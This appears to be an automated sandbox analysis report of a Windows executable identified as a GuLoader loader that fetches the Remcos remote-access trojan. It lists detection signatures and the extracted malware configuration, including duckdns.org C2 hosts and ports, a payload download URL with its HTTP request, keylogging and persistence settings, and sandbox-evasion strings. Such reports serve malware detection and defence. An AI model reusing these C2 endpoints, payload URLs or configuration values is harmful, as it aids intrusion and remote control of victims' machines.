Windows Analysis Report 466XoziOLD.exe

Overview

General Information

Sample Name: 466XoziOLD.exe
Analysis ID: 491189
MD5: 84ade48e59ed36c620d254d325f355d7
SHA1: 6e17eb18c64e00ca9831e940769da9c744a5d5e3
SHA256: 8060a88a8253eafc4c38d56d58d8470b98765308aeafc1e873b95011cbb8cadf
Tags: exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Uses dynamic DNS services
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Abnormal high CPU Usage

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
Source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://sopage.duckdns.org/Remcos_sgJ"}
Multi AV Scanner detection for submitted file
Source: 466XoziOLD.exe Virustotal: Detection: 29% Perma Link
Source: 466XoziOLD.exe ReversingLabs: Detection: 17%
Yara detected Remcos RAT
Source: Yara match File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY
Machine Learning detection for sample
Source: 466XoziOLD.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: 466XoziOLD.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2032776 ET TROJAN Remocs 3.x Unencrypted Checkin 192.168.2.4:49829 -> 23.146.242.71:2404
Source: Traffic Snort IDS: 2032777 ET TROJAN Remocs 3.x Unencrypted Server Response 23.146.242.71:2404 -> 192.168.2.4:49829
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: solex-wave.duckdns.org
Source: Malware configuration extractor URLs: http://sopage.duckdns.org/Remcos_sgJ
Uses dynamic DNS services
Source: unknown DNS query: name: sopage.duckdns.org
Source: unknown DNS query: name: solex-wave.duckdns.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49829 -> 23.146.242.71:2404
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VDI-NETWORKUS VDI-NETWORKUS
Source: Joe Sandbox View ASN Name: VDI-NETWORKUS VDI-NETWORKUS
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp String found in binary or memory: http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp String found in binary or memory: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp String found in binary or memory: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46
Source: unknown DNS traffic detected: queries for: sopage.duckdns.org
Source: global traffic HTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: 466XoziOLD.exe, 00000000.00000002.927536241.000000000073A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: 466XoziOLD.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Sample file is different than original file name gathered from version info
Source: 466XoziOLD.exe, 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
Source: 466XoziOLD.exe, 0000000E.00000000.925461157.0000000000430000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
Source: 466XoziOLD.exe Binary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
PE file contains strange resources
Source: 466XoziOLD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Detected potential crypto function
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8DCB9 0_2_02B8DCB9
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B88E84 0_2_02B88E84
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B80BAF 0_2_02B80BAF
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B89180 0_2_02B89180
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8CB37 0_2_02B8CB37
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8C8CE 0_2_02B8C8CE
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8D818 0_2_02B8D818
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8C81A 0_2_02B8C81A
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8B801 0_2_02B8B801
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8B950 0_2_02B8B950
Contains functionality to call native functions
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B89180 NtAllocateVirtualMemory,LoadLibraryA, 0_2_02B89180
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8CB37 NtWriteVirtualMemory,LoadLibraryA, 0_2_02B8CB37
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8D75C NtProtectVirtualMemory, 0_2_02B8D75C
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8D818 NtWriteVirtualMemory, 0_2_02B8D818
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8C81A NtWriteVirtualMemory, 0_2_02B8C81A
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E5C9 NtProtectVirtualMemory, 14_2_0056E5C9
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E734 Sleep,NtProtectVirtualMemory, 14_2_0056E734
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E590 NtProtectVirtualMemory, 14_2_0056E590
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E608 NtProtectVirtualMemory, 14_2_0056E608
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E5B7 NtProtectVirtualMemory, 14_2_0056E5B7
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E5FD NtProtectVirtualMemory, 14_2_0056E5FD
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 14_2_0056E678 NtProtectVirtualMemory, 14_2_0056E678
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\466XoziOLD.exe Process Stats: CPU usage > 98%
Source: 466XoziOLD.exe Virustotal: Detection: 29%
Source: 466XoziOLD.exe ReversingLabs: Detection: 17%
Source: 466XoziOLD.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\466XoziOLD.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
Source: C:\Users\user\Desktop\466XoziOLD.exe Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
Source: C:\Users\user\Desktop\466XoziOLD.exe Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe' Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-Y0PK9D
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@3/0@2/2
Source: C:\Users\user\Desktop\466XoziOLD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00429D50 push dword ptr [edi+000000BCh]; retn 0010h 0_2_0042A039
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00405408 push es; ret 0_2_00405409
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_0040581D push edx; retf 0_2_0040581B
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00406233 pushfd ; iretd 0_2_00406234
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00406AF5 push eax; retf 0_2_00406AF6
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_004070B2 push esp; ret 0_2_004070D0
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00405F4E push edx; iretd 0_2_00405F4F
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00405B50 push cs; ret 0_2_00405B53
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00403BC7 push FFFFFFC2h; retf 0_2_00403C05
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00403FC9 push edx; rep ret 0_2_00403FE0
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_004057EB push edx; retf 0_2_0040581B
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_00405FFD push eax; iretd 0_2_00406009
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_0040579B push edx; retf 0_2_004057A7
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B85293 push ebp; retf 0_2_02B8529D
Source: initial sample Static PE information: section name: .text entropy: 7.42071533983
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\466XoziOLD.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://SOPAGE.DUCKDNS.ORG/REMCOS_S_BCHLCWVW46.BINHTTP://BACKUPSOLDYN.DUCKDNS.ORG/REMCOS_S_BCHLCWVW46.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp, 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\466XoziOLD.exe TID: 6556 Thread sleep count: 214 > 30 Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe System information queried: ModuleInformation Jump to behavior
Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp, 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\466XoziOLD.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8CB37 mov eax, dword ptr fs:[00000030h] 0_2_02B8CB37
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B88CB6 mov eax, dword ptr fs:[00000030h] 0_2_02B88CB6
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8B2B7 mov eax, dword ptr fs:[00000030h] 0_2_02B8B2B7
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B8BAC8 mov eax, dword ptr fs:[00000030h] 0_2_02B8BAC8
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\466XoziOLD.exe Code function: 0_2_02B890B9 LdrInitializeThunk, 0_2_02B890B9

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\466XoziOLD.exe Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe' Jump to behavior
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Remcos RAT
Source: Yara match File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs